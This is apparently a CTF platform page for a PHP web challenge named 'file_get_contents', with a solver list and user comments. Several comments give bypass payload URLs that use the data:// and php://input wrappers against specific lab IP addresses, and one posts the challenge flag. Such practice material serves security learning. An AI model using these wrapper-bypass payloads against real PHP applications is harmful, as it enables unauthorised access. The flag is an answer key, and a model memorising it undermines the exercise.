file_get_contentsWEB 未解决
分数:
30
金币:
3
题目作者:
harry
一 血:
npfs
一血奖励:
2金币
解 决:
2859
提 示:
描 述:
file_get_contents????
评分(3)
解题动态
player33 攻破了该题 1天前
gyssong 攻破了该题 1天前
yitiaoxanyu123 攻破了该题 1天前
xiuliyeer1 攻破了该题 2天前
K1o0p3 攻破了该题 6天前
xfiles2010 攻破了该题 6天前
WYEJOJO 攻破了该题 7天前
⎛⎝•̀ω•́⎠⎞ 攻破了该题 9天前
我头都要大啦 攻破了该题 9天前
lotuswhite 攻破了该题 11天前
coolsword2023 攻破了该题 12天前
LUCKY721 攻破了该题 19天前
donbrothers 攻破了该题 19天前
15346899030 攻破了该题 20天前
111jing 攻破了该题 20天前
1759605630 攻破了该题 20天前
Sinon 攻破了该题 21天前
clown110 攻破了该题 21天前
zhwen 攻破了该题 23天前
评论
一路奔腾 4月前
举报
file_get_contents函数绕过,可以参考https://www.pianshen.com/article/24421724508/
steve07222 9月前
举报
http://114.67.175.224:18454/?ac=1&fn=data://text/plain,1
wxy1343 11月前
举报
http://114.67.175.224:15664/?ac=1&fn=data:,1
wxy1343 11月前
举报
flag{6fccd47ef5e5988f1e2c4989bf554614}
你比大葱更美丽 1年前
举报
用php://input的话post传参hackbar好像不行,我是用burp抓包传的才行的
Striker123456 1年前
举报
简简单单的变量覆盖
Striker123456 1年前
举报
@J_0k3r 没有extract的$fn就不可控了
J_0k3r 1年前
举报
不是文件包含吗QAQ,跟变量覆盖有什么关系
zdfy005 1年前
举报
POST /?ac=flag&fn=php://input HTTP/1.1 删除Content-Type: POST flag
wjwjwjwcwcwc 1年前
举报
http://114.67.175.224:18854/?ac=1&fn=php://input hackbar中post赋值1
aWxvdmVjdGY 1年前
举报
使用php://input伪协议绕过 ① 将要GET的参数?xxx=php://input ② 用post方法传入想要file_get_contents()函数返回的值 用data://伪协议绕过 将url改为:?xxx=data://text/plain;base64,想要file_get_contents()函数返回的值的base64编码 或者将url改为:?xxx=data:te
笨笨笨蛋 1年前
举报
看到file_get_contents就应该想到用php://input 学到了